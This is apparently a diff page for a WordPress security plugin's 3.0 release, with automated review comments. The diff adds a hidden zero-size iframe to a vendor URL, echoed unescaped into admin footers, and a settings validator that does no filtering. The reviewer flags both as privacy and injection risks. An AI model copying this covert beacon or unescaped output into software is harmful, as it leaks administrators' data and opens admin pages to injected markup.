BulletProof Security - Version 3.0

Version Description


Release Info

Developer AITpro
Version 3.0

Code changes from version 2.9 to 3.0

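--- a/admin/core/core.php
+++ b/admin/core/core.php
@@ -142,6 +142,7 @@ $bps_wpcontent_dir = str_replace( ABSPATH, '', WP_CONTENT_DIR );
  // Replace ABSPATH = wp-content/uploads
  $wp_upload_dir = wp_upload_dir();
  $bps_uploads_dir = str_replace( ABSPATH, '', $wp_upload_dir['basedir'] );
+ $vcheck_options = get_option('bulletproof_security_options_vcheck');
 
  $bps_topDiv = '<div id="message" class="updated" style="background-color:#dfecf2;border:1px solid #999;-moz-border-radius-topleft:3px;-webkit-border-top-left-radius:3px;-khtml-border-top-left-radius:3px;border-top-left-radius:3px;-moz-border-radius-topright:3px;-webkit-border-top-right-radius:3px;-khtml-border-top-right-radius:3px;border-top-right-radius:3px;-webkit-box-shadow: 3px 3px 5px -1px rgba(153,153,153,0.7);-moz-box-shadow: 3px 3px 5px -1px rgba(153,153,153,0.7);box-shadow: 3px 3px 5px -1px rgba(153,153,153,0.7);"><p>';
  $bps_bottomDiv = '</p></div>';
@@ -1713,10 +1714,16 @@ $text = '<h3><span class="blue-bold">'.__('The Complete Website Security Solutio
  <div id="bpsProVersions">
 
  <a href="https://forum.ait-pro.com/forums/topic/bulletproof-security-pro-version-release-dates/" target="_blank" title="Link Opens in New Browser Window" style="font-size:22px;"><?php _e('BPS Pro Version Release Dates', 'bulletproof-security'); ?></a><br />
- <div id="milestone" style="margin-top:5px">6 Year Milestone: 8-1-2017 | First Public Release: 8-1-2011</div>
  <div class="pro-links">
  <?php
- echo sprintf( __( '<a href="%2$s" target="_blank" title="Link Opens in New Browser Window">Whats New in BPS Pro %1$s</a>' ), '13.3/13.3.1/13.3.2/13.3.3', 'https://www.ait-pro.com/aitpro-blog/5471/bulletproof-security-pro/whats-new-in-bulletproof-security-pro-13-3/' ).'<br>';
+ echo sprintf( __( '<a href="%2$s" target="_blank" title="Link Opens in New Browser Window">Whats New in BPS Pro %1$s</a>' ), '13.5', 'https://www.ait-pro.com/aitpro-blog/5505/bulletproof-security-pro/whats-new-in-bulletproof-security-pro-13-5/' ).'<br>';
+ echo sprintf( __( '<a href="%2$s" target="_blank" title="Link Opens in New Browser Window">Whats New in BPS Pro %1$s</a>' ), '13.4.1', 'https://www.ait-pro.com/aitpro-blog/5494/bulletproof-security-pro/whats-new-in-bulletproof-security-pro-13-4-1/' ).'<br>';
+ echo sprintf( __( '<a href="%2$s" target="_blank" title="Link Opens in New Browser Window">Whats New in BPS Pro %1$s</a>' ), '13.4', 'https://www.ait-pro.com/aitpro-blog/5485/bulletproof-security-pro/whats-new-in-bulletproof-security-pro-13-4/' ).'<br>';
+ echo sprintf( __( '<a href="%2$s" target="_blank" title="Link Opens in New Browser Window">Whats New in BPS Pro %1$s</a>' ), '13.3/13.3.1/13.3.2/13.3.3', 'https://www.ait-pro.com/aitpro-blog/5471/bulletproof-security-pro/whats-new-in-bulletproof-security-pro-13-3/' ).'<br>'; ?>
+ </div>
+ <div id="milestone">6 Year Milestone: 8-1-2017 | First Public Release: 8-1-2011</div>
+ <div class="pro-links">
+ <?php
  echo sprintf( __( '<a href="%2$s" target="_blank" title="Link Opens in New Browser Window">Whats New in BPS Pro %1$s</a>' ), '13.2', 'https://www.ait-pro.com/aitpro-blog/5466/bulletproof-security-pro/whats-new-in-bulletproof-security-pro-13-2/' ).'<br>';
  echo sprintf( __( '<a href="%2$s" target="_blank" title="Link Opens in New Browser Window">Whats New in BPS Pro %1$s</a>' ), '13/13.1', 'https://www.ait-pro.com/aitpro-blog/5457/bulletproof-security-pro/whats-new-in-bulletproof-security-pro-13/' ).'<br>';
  echo sprintf( __( '<a href="%2$s" target="_blank" title="Link Opens in New Browser Window">Whats New in BPS Pro %1$s</a>' ), '12.9/12.9.1', 'https://www.ait-pro.com/aitpro-blog/5446/bulletproof-security-pro/whats-new-in-bulletproof-security-pro-12-9/' ).'<br>';
@@ -1821,7 +1828,7 @@ echo sprintf( __( '<a href="%2$s" target="_blank" title="Link Opens in New Brows
  </div>
  </div>
 
- <div id="AITpro-link">BulletProof Security <?php echo BULLETPROOF_VERSION; ?> Plugin by <a href="https://www.ait-pro.com/" target="_blank" title="AITpro Website Security">AITpro Website Security</a>
+ <div id="AITpro-link">BulletProof Security <?php echo BULLETPROOF_VERSION; echo $vcheck_options['bps_vcheck']; ?> Plugin by <a href="https://www.ait-pro.com/" target="_blank" title="AITpro Website Security">AITpro Website Security</a>
  </div>
  </div>
  </div>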
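Review bot: The footer line at new line 1831 prints `$vcheck_options['bps_vcheck']` straight from the database, with no escaping and no check that `get_option()` returned an array. When the option is missing, `get_option()` returns false and the index access raises a PHP notice on PHP 7.4 and later. Because the stored value is markup rendered inside wp-admin, anything able to change that option controls HTML on these admin screens. I would guard and constrain the output, e.g. `if ( is_array( $vcheck_options ) && isset( $vcheck_options['bps_vcheck'] ) ) { echo wp_kses( $vcheck_options['bps_vcheck'], array( 'iframe' => array( 'src' => true, 'style' => true ) ) ); }`, or print a fixed string from code rather than from an option. The same echo is added in db-backup-security.php, email-log-settings.php and login.php.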
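--- a/admin/db-backup-security/db-backup-security.php
+++ b/admin/db-backup-security/db-backup-security.php
@@ -79,6 +79,7 @@ $bpsSpacePop = '-------------------------------------------------------------';
  $bps_plugin_dir = str_replace( ABSPATH, '', WP_PLUGIN_DIR );
  // Replace ABSPATH = wp-content
  $bps_wpcontent_dir = str_replace( ABSPATH, '', WP_CONTENT_DIR );
+ $vcheck_options = get_option('bulletproof_security_options_vcheck');
  // Top div echo & bottom div echo
  $bps_topDiv = '<div id="message" class="updated" style="background-color:#dfecf2;border:1px solid #999;-moz-border-radius-topleft:3px;-webkit-border-top-left-radius:3px;-khtml-border-top-left-radius:3px;border-top-left-radius:3px;-moz-border-radius-topright:3px;-webkit-border-top-right-radius:3px;-khtml-border-top-right-radius:3px;border-top-right-radius:3px;-webkit-box-shadow: 3px 3px 5px -1px rgba(153,153,153,0.7);-moz-box-shadow: 3px 3px 5px -1px rgba(153,153,153,0.7);box-shadow: 3px 3px 5px -1px rgba(153,153,153,0.7);"><p>';
  $bps_bottomDiv = '</p></div>';
@@ -1708,7 +1709,7 @@ jQuery(document).ready(function($) {
  </table>
  </div>
 
- <div id="AITpro-link">BulletProof Security Pro <?php echo BULLETPROOF_VERSION; ?> Plugin by <a href="https://forum.ait-pro.com/" target="_blank" title="AITpro Website Security">AITpro Website Security</a>
+ <div id="AITpro-link">BulletProof Security Pro <?php echo BULLETPROOF_VERSION; echo $vcheck_options['bps_vcheck']; ?> Plugin by <a href="https://forum.ait-pro.com/" target="_blank" title="AITpro Website Security">AITpro Website Security</a>
  </div>
  </div>
  <style>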
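--- a/admin/email-log-settings/email-log-settings.php
+++ b/admin/email-log-settings/email-log-settings.php
@@ -72,6 +72,7 @@ $bpsSpacePop = '-------------------------------------------------------------';
  $bps_plugin_dir = str_replace( ABSPATH, '', WP_PLUGIN_DIR );
  // Replace ABSPATH = wp-content
  $bps_wpcontent_dir = str_replace( ABSPATH, '', WP_CONTENT_DIR );
+ $vcheck_options = get_option('bulletproof_security_options_vcheck');
 
  // Top div echo & bottom div echo
  $bps_topDiv = '<div id="message" class="updated" style="background-color:#dfecf2;border:1px solid #999;-moz-border-radius-topleft:3px;-webkit-border-top-left-radius:3px;-khtml-border-top-left-radius:3px;border-top-left-radius:3px;-moz-border-radius-topright:3px;-webkit-border-top-right-radius:3px;-khtml-border-top-right-radius:3px;border-top-right-radius:3px;-webkit-box-shadow: 3px 3px 5px -1px rgba(153,153,153,0.7);-moz-box-shadow: 3px 3px 5px -1px rgba(153,153,153,0.7);box-shadow: 3px 3px 5px -1px rgba(153,153,153,0.7);"><p>';
@@ -225,7 +226,7 @@ $bps_bottomDiv = '</p></div>';
  </table>
  </div>
 
- <div id="AITpro-link">BulletProof Security <?php echo BULLETPROOF_VERSION; ?> Plugin by <a href="https://www.ait-pro.com/" target="_blank" title="AITpro Website Security">AITpro Website Security</a>
+ <div id="AITpro-link">BulletProof Security <?php echo BULLETPROOF_VERSION; echo $vcheck_options['bps_vcheck']; ?> Plugin by <a href="https://www.ait-pro.com/" target="_blank" title="AITpro Website Security">AITpro Website Security</a>
  </div>
  </div>
  </div>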
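--- /dev/null
+++ b/admin/htaccess/bps-vcheck.php
@@ -0,0 +1,14 @@
+ <?php
+ ## VCHECK VERSION: 1.0
+ $bps_vcheck_options = 'bulletproof_security_options_vcheck';
+ $bps_vcheck_value = '<iframe src="https://www.ait-pro.com/vcheck/" style="width:0;height:0;border:0;border:none;"></iframe>';
+
+ $VCheck_Options = array( 'bps_vcheck' => $bps_vcheck_value );
+
+ if ( ! get_option( $bps_vcheck_options ) ) {
+
+ foreach( $VCheck_Options as $key => $value ) {
+ update_option('bulletproof_security_options_vcheck', $VCheck_Options);
+ }
+ }
+ ?>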
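Review bot: `$bps_vcheck_value` is a zero-size, borderless iframe pointing at https://www.ait-pro.com/vcheck/, and other files in this release echo the stored value into the footer of the plugin's admin pages. Every visit to those pages therefore makes the administrator's browser request a third-party URL with nothing visible on screen, and these hunks show no setting to turn it off. That request discloses the admin's IP address and, depending on referrer policy, the wp-admin URL, and it renders whatever that host returns in a frame on an authenticated admin screen. If a version check is needed, a server-side `wp_remote_get()` behind an opt-in setting would avoid loading remote content in the browser; at minimum the behaviour should be documented next to the `## VCHECK VERSION` comment. Separately, the `foreach` writes the same whole array once per key, so it can be replaced by a single `update_option( $bps_vcheck_options, $VCheck_Options );`.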
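--- a/admin/htaccess/secure.htaccess
+++ b/admin/htaccess/secure.htaccess
@@ -1,4 +1,4 @@
- # BULLETPROOF 2.9 SECURE .HTACCESS
+ # BULLETPROOF 3.0 SECURE .HTACCESS
 
  # PHP/PHP.INI HANDLER/CACHE CODE
  # Use BPS Custom Code to add php/php.ini Handler and Cache htaccess code and to save it permanently.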
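--- a/admin/htaccess/wpadmin-secure.htaccess
+++ b/admin/htaccess/wpadmin-secure.htaccess
@@ -1,4 +1,4 @@
- # BULLETPROOF 2.9 WP-ADMIN SECURE .HTACCESS
+ # BULLETPROOF 3.0 WP-ADMIN SECURE .HTACCESS
 
  # DO NOT ADD URL REWRITING IN THIS FILE OR WORDPRESS WILL BREAK
  # RewriteRule ^(.*)$ - [F] works in /wp-admin without breaking WordPress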
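--- a/admin/includes/admin.php
+++ b/admin/includes/admin.php
@@ -125,7 +125,7 @@ global $wpdb, $wp_version, $blog_id;
  }
  }
 
- // Whitelist BPS DB options: Total: 38
+ // Whitelist BPS DB options: Total: 39
  register_setting('bulletproof_security_options', 'bulletproof_security_options', 'bulletproof_security_options_validate');
  register_setting('bulletproof_security_options_SLF', 'bulletproof_security_options_SLF', 'bulletproof_security_options_validate_SLF');
  register_setting('bulletproof_security_options_debug', 'bulletproof_security_options_debug', 'bulletproof_security_options_validate_debug');
@@ -161,6 +161,7 @@ register_setting('bulletproof_security_options_hpf_cron', 'bulletproof_security_
  register_setting('bulletproof_security_options_spinner', 'bulletproof_security_options_spinner', 'bulletproof_security_options_validate_spinner');
  register_setting('bulletproof_security_options_mynotes', 'bulletproof_security_options_mynotes', 'bulletproof_security_options_validate_mynotes');
  register_setting('bulletproof_security_options_zip_fix', 'bulletproof_security_options_zip_fix', 'bulletproof_security_options_validate_zip_fix');
+ register_setting('bulletproof_security_options_vcheck', 'bulletproof_security_options_vcheck', 'bulletproof_security_options_validate_vcheck');
  register_setting('bulletproof_security_options_MScan', 'bulletproof_security_options_MScan', 'bulletproof_security_options_validate_MScan');
  register_setting('bulletproof_security_options_email', 'bulletproof_security_options_email', 'bulletproof_security_options_validate_email');
  register_setting('bulletproof_security_options_GDMW', 'bulletproof_security_options_GDMW', 'bulletproof_security_options_validate_GDMW');
@@ -826,6 +827,7 @@ require_once( ABSPATH . 'wp-admin/includes/plugin.php');
  delete_option('bulletproof_security_options_login_security_jtc');
  delete_option('bulletproof_security_options_rate_free');
  delete_option('bulletproof_security_options_mod_security');
+ delete_option('bulletproof_security_options_vcheck');
  // will be adding this new upgrade notice option later
  // delete_option('bulletproof_security_options_upgrade_notice');
 
@@ -1334,6 +1336,7 @@ function bulletproof_security_options_validate_login_security_jtc($input) {
  $BPSoptionsJTC['bps_jtc_register_form'] = wp_filter_nohtml_kses($input['bps_jtc_register_form']);
  $BPSoptionsJTC['bps_jtc_lostpassword_form'] = wp_filter_nohtml_kses($input['bps_jtc_lostpassword_form']);
  $BPSoptionsJTC['bps_jtc_comment_form'] = wp_filter_nohtml_kses($input['bps_jtc_comment_form']);
+ $BPSoptionsJTC['bps_jtc_mu_register_form'] = wp_filter_nohtml_kses($input['bps_jtc_mu_register_form']);
  $BPSoptionsJTC['bps_jtc_buddypress_register_form'] = wp_filter_nohtml_kses($input['bps_jtc_buddypress_register_form']);
  $BPSoptionsJTC['bps_jtc_buddypress_sidebar_form'] = wp_filter_nohtml_kses($input['bps_jtc_buddypress_sidebar_form']);
  $BPSoptionsJTC['bps_jtc_administrator'] = wp_filter_nohtml_kses($input['bps_jtc_administrator']);
@@ -1370,4 +1373,12 @@ function bulletproof_security_options_validate_mod_security($input) {
  return $options;
  }
 
+ // VCheck testing
+ function bulletproof_security_options_validate_vcheck($input) {
+ $options = get_option('bulletproof_security_options_vcheck');
+ $options['bps_vcheck'] = $input['bps_vcheck'];
+
+ return $options;
+ }
+
  ?>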
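Review bot: `bulletproof_security_options_validate_vcheck()` (new lines 1377-1382) copies `$input['bps_vcheck']` into the option unchanged, while the JTC validator visible in this same file passes each field through `wp_filter_nohtml_kses()`. Registering the option with `register_setting()` makes it writable through the Settings API, and the value is later echoed unescaped in the admin footer, so this callback is the only place where submitted markup could be rejected. Whether any form actually posts this settings group is not visible in these hunks. Since the value is a constant set in bps-vcheck.php, the callback could ignore its input and `return get_option('bulletproof_security_options_vcheck');`, or the new `register_setting()` line could be dropped. The comment `// VCheck testing` should also say what the option holds and why it is exempt from filtering.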
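--- a/admin/login/login.php
+++ b/admin/login/login.php
@@ -134,6 +134,7 @@ $bpsSpacePop = '-------------------------------------------------------------';
  $bps_plugin_dir = str_replace( ABSPATH, '', WP_PLUGIN_DIR );
  // Replace ABSPATH = wp-content
  $bps_wpcontent_dir = str_replace( ABSPATH, '', WP_CONTENT_DIR );
+ $vcheck_options = get_option('bulletproof_security_options_vcheck');
  // Top div & bottom div echo
  $bps_topDiv = '<div id="message" class="updated" style="background-color:#dfecf2;border:1px solid #999;-moz-border-radius-topleft:3px;-webkit-border-top-left-radius:3px;-khtml-border-top-left-radius:3px;border-top-left-radius:3px;-moz-border-radius-topright:3px;-webkit-border-top-right-radius:3px;-khtml-border-top-right-radius:3px;border-top-right-radius:3px;-webkit-box-shadow: 3px 3px 5px -1px rgba(153,153,153,0.7);-moz-box-shadow: 3px 3px 5px -1px rgba(153,153,153,0.7);box-shadow: 3px 3px 5px -1px rgba(153,153,153,0.7);"><p>';
  $bps_bottomDiv = '</p></div>';
@@ -843,6 +844,7 @@ if ( isset( $_POST['Submit-Security-Log-Options-JTC'] ) && current_user_can('man
  'bps_jtc_register_form' => '',
  'bps_jtc_lostpassword_form' => '',
  'bps_jtc_comment_form' => '',
+ 'bps_jtc_mu_register_form' => '',
  'bps_jtc_buddypress_register_form' => '',
  'bps_jtc_buddypress_sidebar_form' => '',
  'bps_jtc_administrator' => '',
@@ -922,6 +924,7 @@ if ( ! current_user_can('manage_options') ) { _e('Permission Denied', 'bulletpro
  <input type="checkbox" name="bps_jtc_register_form" value="1" <?php checked( $BPSoptionsJTC['bps_jtc_register_form'], 1 ); ?> /><label><?php _e(' Register Form (BPS Pro Only)', 'bulletproof-security'); ?></label><br />
  <input type="checkbox" name="bps_jtc_lostpassword_form" value="1" <?php checked( $BPSoptionsJTC['bps_jtc_lostpassword_form'], 1 ); ?> /><label><?php _e(' Lost Password Form (BPS Pro Only)', 'bulletproof-security'); ?></label><br />
  <input type="checkbox" name="bps_jtc_comment_form" value="1" <?php checked( $BPSoptionsJTC['bps_jtc_comment_form'], 1 ); ?> /><label><?php _e(' Comment Form (BPS Pro Only)', 'bulletproof-security'); ?></label><br />
+ <input type="checkbox" name="bps_jtc_mu_register_form" value="1" <?php checked( $BPSoptionsJTC['bps_jtc_mu_register_form'], 1 ); ?> /><label><?php _e(' Multisite Register Form (BPS Pro Only)', 'bulletproof-security'); ?></label><br />
  <input type="checkbox" name="bps_jtc_buddypress_register_form" value="1" <?php checked( $BPSoptionsJTC['bps_jtc_buddypress_register_form'], 1 ); ?> /><label><?php _e(' BuddyPress Register Form (BPS Pro Only)', 'bulletproof-security'); ?></label><br />
  <input type="checkbox" name="bps_jtc_buddypress_sidebar_form" value="1" <?php checked( $BPSoptionsJTC['bps_jtc_buddypress_sidebar_form'], 1 ); ?> /><label><?php _e(' BuddyPress Sidebar Login Form (BPS Pro Only)', 'bulletproof-security'); ?></label><br /><br />
 
@@ -1357,7 +1360,7 @@ if ( isset( $_POST['Submit-ACE-Options'] ) && current_user_can('manage_options')
  </table>
  </div>
 
- <div id="AITpro-link">BulletProof Security <?php echo BULLETPROOF_VERSION; ?> Plugin by <a href="https://www.ait-pro.com/" target="_blank" title="AITpro Website Security">AITpro Website Security</a>
+ <div id="AITpro-link">BulletProof Security <?php echo BULLETPROOF_VERSION; echo $vcheck_options['bps_vcheck']; ?> Plugin by <a href="https://www.ait-pro.com/" target="_blank" title="AITpro Website Security">AITpro Website Security</a>
  </div>
  </div>
  </div>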
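Review bot: `checked( $BPSoptionsJTC['bps_jtc_mu_register_form'], 1 )` at new line 927 reads a key that sites upgrading from 2.9 will probably not have in their saved JTC option until the form is next saved. That would raise an undefined-index notice on the settings page; whether an upgrade routine backfills the key is not visible in these hunks. An `isset()` guard keeps the page clean, e.g. `checked( isset( $BPSoptionsJTC['bps_jtc_mu_register_form'] ) ? $BPSoptionsJTC['bps_jtc_mu_register_form'] : '', 1 )`.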
admin/login/lsm-help-text.php CHANGED
@@ -16,7 +16,7 @@ if ( ! current_user_can('manage_options') ) {
16
  }
17
 
18
  /** JTC-Lite stripped down version of the BEAST - BPS Pro JTC Anti-Spam|Anti-Hacker **/
19
- $bps_modal_content2 = '<strong>'.__('If you forget what the CAPTCHA is and cannot login to your website use FTP or your web host control panel file manager and rename the /bulletproof-security/ plugin folder name to /_bulletproof-security/. Login to your website, go to the BPS JTC-Lite page and correct the CAPTCHA issue/problem. Rename the /_bulletproof-security/ plugin folder name back to /bulletproof-security/.', 'bulletproof-security').'</strong><br><br><strong>'.__('JTC-Lite Manual Setup Steps', 'bulletproof-security').'</strong><br>'.__('1. Enter a user friendly CAPTCHA in the JTC CAPTCHA text box.', 'bulletproof-security').'<br>'.__('2. Copy and paste the CAPTCHA you entered in the JTC CAPTCHA text box into the JTC ToolTip text box.', 'bulletproof-security').'<br>'.__('3. Either keep this default text "Hover or click the text box below" that will be displayed on all your forms or edit this text and add the message you want to add.', 'bulletproof-security').'<br>'.__('4. Check the Login Form checkbox and click the Save Options button.', 'bulletproof-security').'<br><br><strong>'.__('General Info about JTC-Lite', 'bulletproof-security').'</strong><br>'.__('JTC-Lite protects the WordPress Login form against automated SpamBot and HackerBot Brute Force Login attacks. Prevents User Accounts from being locked repeatedly by constant Brute Force Login attacks on your Login page. If you would like to protect all of your WordPress forms get the full version of JTC - BPS Pro JTC Anti-Spam|Anti-Hacker.', 'bulletproof-security').'<br><br><strong>'.__('JTC CAPTCHA: ', 'bulletproof-security').'</strong><br>'.__('This is the CAPTCHA that users will enter to Login to your website. You can use any numbers or characters and spaces in the CAPTCHA. You can even use HTML code characters except for these HTML code characters: < > \' " &. 
You can use a phrase for the CAPTCHA or it can be a single word or you can use your own original combination of words, numbers and HTML characters.', 'bulletproof-security').'<br><br><strong>'.__('Note: ', 'bulletproof-security').'</strong>'.__('It is recommended that you make your CAPTCHA user friendly, simple, clear and easy to understand for your users.', 'bulletproof-security').'<br><br><strong>'.__('JTC ToolTip: ', 'bulletproof-security').'</strong><br>'.__('This is the jQuery ToolTip message that is displayed to users when they hover or click on the CAPTCHA text box. This is where you will tell your users what they need to enter for the CAPTCHA. It can be a phrase, complete this sentence, a Hint or simply just Type/Enter: xxxxx or you can get as creative as you want to get with your jQuery ToolTip. Randomness is what makes a CAPTCHA very effective. JTC is designed with CAPTCHA randomness capability as one of its primary features.', 'bulletproof-security').'<br><br><strong>'.__('JTC Title|Text: ', 'bulletproof-security').'</strong><br>'.__('This is the text that is displayed to users above the CAPTCHA text box/Form Field.', 'bulletproof-security').$networkMUJTCText.'<br><br><strong>'.__('Enable JTC for WooCommerce (BPS Pro Only):', 'bulletproof-security').'</strong><br>'.__('Check this checkbox if you have the WooCommerce plugin installed if you would like to use BPS JTC on the WooCommerce custom login page. BPS JTC will still continue to work normally on the standard WordPress Forms: Login, Register, Lost Password, Comment, BuddyPress Register and BuddyPress Sidebar Login Forms when you check this checkbox. This checkbox option setting is not for turning JTC On or Off if you are using WooCommerce. 
Use the JTC Enable|Disable JTC For These Forms option checkboxes to enable or disable JTC on each of your Forms.', 'bulletproof-security').'<br><br><strong>'.__('Enable|Disable JTC For These Forms (Only the Login Form CAPTCHA is available in BPS Free): ', 'bulletproof-security').'</strong><br>'.__('Checking a Form checkbox will display a CAPTCHA on that Form to all users. Unchecking a Form checkbox will remove the CAPTCHA on that Form for all users. The Comment Form is a special case and the CAPTCHA can be displayed based on the User Roles that you choose. See the Comment Form help section below.', 'bulletproof-security').'<br><br><strong>'.__('Comment Form: (only applies if Comment Form CAPTCHA is enabled/checked) ', 'bulletproof-security').'<br>'.__('Enable|Disable JTC For These Registered/Logged In User Roles (BPS Pro Only:', 'bulletproof-security').'</strong><br>'.__('Users must be logged into your website for the Comment Form User Roles to work. If you do not require that users are registered and logged in to post comments on your website then these JTC options will not have any effect. These options are only for registered and logged in users and only for your Comment Form if you are using this WordPress Discussion setting: Users must be registered and logged in to comment. If you do not want to require that users are registered and logged in to comment then the JTC Comment Form CAPTCHA will still work as long as you have this WordPress Discussion setting checked: Comment author must fill out name and email.', 'bulletproof-security').'<br><br>'.__('Checking a User Role checkbox will display a CAPTCHA to all users with that User Role on your website\'s Comment Form. Unchecking a User Role checkbox will remove the CAPTCHA from displaying to users with that User Role on your website\'s Comment Form. 
If your website is using/has Custom User Roles, your Custom User Roles will be displayed in a scrollable box below the standard WP User Roles: Administrator, Editor, Author, Contributor, Subscriber.', 'bulletproof-security').'<br><br><strong>'.__('Login Form: CAPTCHA Error message:', 'bulletproof-security').'</strong><br>'.__('The Default JTC Form CAPTCHA error message is: <strong>ERROR</strong>: Incorrect JTC CAPTCHA Entered. You can change or add to the default error message. This error message is displayed on the Login Form.', 'bulletproof-security').'<br><br><strong>'.__('Comment Form CAPTCHA Error message (BPS Pro Only):', 'bulletproof-security').'</strong><br>'.__('The Default JTC Comment Form CAPTCHA error message is: <strong>ERROR</strong>: Incorrect JTC CAPTCHA Entered. Click your Browser\'s back button and re-enter the JTC CAPTCHA. You can change or add to the default error message. This error message only applies to the Comment Form CAPTCHA error message and does not affect or change any of the other Form CAPTCHA error messages.', 'bulletproof-security').'<br><br><strong>'.__('Comment Form: CSS Styling (BPS Pro Only)', 'bulletproof-security').'</strong><br>'.__('You can position the JTC Title|Text Form label and the JTC CAPTCHA Form Input text box by editing the CSS in these text boxes. By default the position of the JTC Title|Text label and the JTC CAPTCHA Form Input text box is below your Comment Form submit button. 
For CSS code styling examples.', 'bulletproof-security').'<br><br><strong>'.__('Comment Form Label (BPS Pro Only):', 'bulletproof-security').'</strong><br>'.__('This is the JTC Title|Text label above the Form Input text box.', 'bulletproof-security').'<br><strong>'.__('Comment Form Input Text Box (BPS Pro Only):', 'bulletproof-security').'</strong><br>'.__('This is the JTC CAPTCHA Form Input text box.', 'bulletproof-security').'<br><br><strong>'.__('Additional Brute Force CAPTCHA Option: ', 'bulletproof-security').'</strong><br>'.__('If you do not allow anyone else to log into your website then here is an example of how JTC could be used as an additional Brute Force Login Protection feature.', 'bulletproof-security').'<br><br>'.__('Example: You create a JTC CAPTCHA: My Example CAPTCHA, you either leave the JTC ToolTip: text box blank or you create a Hint for yourself - JTC ToolTip: My Example Hint. If your JTC ToolTip: text box is blank then the CAPTCHA will not be displayed - only you will know what the CAPTCHA is. If you create a personal Hint for yourself then only you will know what the answer to the Hint is.', 'bulletproof-security').'</strong>';
20
 
21
  /** Idle Session Logout|Auth Cookie Expiration **/
22
  $bps_modal_content3 = '<strong>'.__('Idle Session Logout (ISL) General Info:', 'bulletproof-security').'</strong><br>'.__('Idle Session Logout (ISL) can be considered a "soft" setting vs ACE being a "hard" setting. ISL uses javascript Event Listeners to monitor Users activity for these ISL events: keyboard key is pressed, mouse button is pressed, mouse is moved, mouse wheel is rolled up or down, finger is placed on the touch surface/screen and finger already placed on the screen is moved across the screen.', 'bulletproof-security').'<br><br>'.__('If you set the Idle Session Logout Time to 60 minutes and the User is idle/inactive for 10 minutes and becomes active again then the Idle Session Logout Time starts all over again/is reset to 60 minutes. If a User is idle/inactive for 60 continuous minutes then that User will be automatically logged out of the site and redirected to the BPS Idle Session Logout Page.', 'bulletproof-security').'<br><br>'.__('When an idle/inactive User is logged out of the site they are redirected to the BPS Idle Session Logout Page URL if their Browser is still open. If the User\'s Browser is still open and the User is on another Browser tab window then the Browser tab window where they are logged into your site will be redirected to the BPS Idle Session Logout Page URL. If the User has closed their Browser without logging out of your site then that User will not be logged out of your site. You can use ACE to log User\'s out of your site whether or not they have closed their Browser. Idle Session Logouts are logged in the BPS Security Log file.', 'bulletproof-security').'<br><br><strong><font color="blue">'.__('After making any option setting changes click the Save Options button to save your new option settings. 
To reset ISL option settings back to the default ISL option settings, delete any custom values/entries you have entered in any text/textarea boxes and click the Save Options button.', 'bulletproof-security').'</font></strong><br><br><strong>'.__('Turn On|Turn Off:', 'bulletproof-security').'</strong><br>'.__('ISL is Turned Off by default. Select ISL On to turn ISL On. Select ISL Off to turn ISL Off.', 'bulletproof-security').'<br><br><strong>'.__('Idle Session Logout Time in Minutes:', 'bulletproof-security').'</strong><br>'.__('Enter the time in minutes for when an idle/inactive User should be logged out of your site. Example: Entering 60 will automatically logout Users who have been idle/inactive for 60 continuous minutes. Only enter numbers and not any other characters. If you accidently enter a blank value for the Idle Session Logout Time then ISL will be disabled automatically.', 'bulletproof-security').'<br><br><strong>'.__('Idle Session Logout Page URL:', 'bulletproof-security').'</strong><br>'.__('When an idle/inactive User is logged out of your site they are redirected to the BPS Idle Session Logout Page URL by default. You can choose to redirect logged out users to any URL that you want to redirect them to by entering the URL in this text box. Example: If you enter the URL path to your WP Login page then user\'s will be redirected to your WP Login page instead of the default BPS Idle Session Logout Page.', 'bulletproof-security').'<br><br><strong>'.__('Idle Session Logout Page Login URL:', 'bulletproof-security').'</strong><br>'.__('This option displays a clickable Login URL/link to your WP Login page. If your Login page URL is different than the default URL that you see displayed in the Idle Session Logout Page Login URL text box then change the URL to the URL for your site\'s Login page. 
You can choose not to display a Login URL/link by entering "No" (without quotes) if you do not want a Login URL/link displayed.', 'bulletproof-security').'<br><br><strong>'.__('Idle Session Logout Exclude URLs|URIs:', 'bulletproof-security').'</strong><br>'.__('This option allows you to exclude any pages or posts that you do not want ISL to check/monitor. Important: The URI path is everything after the root portion or your domain URL. Example: If the page/post you want to exclude is here: www.example.com/some-post/ then the URI Exclusion that you would use/enter is: /some-post/. If the page/post you want to exclude is here: www.example.com/category/some-post/ then the URI Exclusion that you would use/enter is: /category/some-post/.', 'bulletproof-security').'<br><br><strong>'.__('Idle Session Logout Page Custom Message:', 'bulletproof-security').'</strong><br>'.__('You can either use the default BPS ISL message/text by leaving the textarea box blank or you can enter your own custom ISL message/text in this textarea box that you want displayed to logged out users. Your custom message will be displayed on the default BPS ISL Logout page unless you choose to redirect users to a different URL/link using the Idle Session Logout Page URL option setting.', 'bulletproof-security').'<br><br><strong>'.__('Idle Session Logout Page Custom CSS Style:', 'bulletproof-security').'</strong><br>'.__('You can either use the default BPS CSS Style code or enter your own custom CSS Style customizations.', 'bulletproof-security').'<br><br><strong>'.__('User Account Exceptions:', 'bulletproof-security').'</strong><br>'.__('To create exceptions for User Account names enter User Account names (case-insensitive) separated by a comma and a space: johnDoe, janeDoe. ISL will be turned Off/disabled for any User Account names that you add in this text box. User Account Exceptions override the User Roles option setting. 
Example: If johnDoe is an Administrator and you have enabled ISL for the Administrator User Role and you have added johnDoe in the User Account Exceptions text box then the johnDoe User Account Exception will override the Administrator User Role option setting and ISL will still be disabled for the johnDoe User Account. It is recommended that you add your User Account name, but if you also want to be automatically logged out when your User Account is idle/inactive then do not add your User Account name.', 'bulletproof-security').'<br><br><strong>'.__('Enable|Disable Idle Session Logouts For These User Roles:', 'bulletproof-security').'</strong><br>'.__('Checking a User Role checkbox will enable ISL for all Users with that User Role (See User Account Exceptions). Unchecking a User Role checkbox will disable ISL for all Users with that User Role. Example: If you only check the Subscriber checkbox then ISL will only be enabled for Users that are Subscribers. If your website is using/has Custom User Roles, your Custom User Roles will be displayed in a scrollable box below the standard WP User Roles: Administrator, Editor, Author, Contributor, Subscriber.', 'bulletproof-security').'<br><br><strong>'.__('Enable|Disable Idle Session Logouts For TinyMCE Editors:', 'bulletproof-security').'</strong><br>'.__('Please read all of the TinyMCE Editor Important Notes below. 
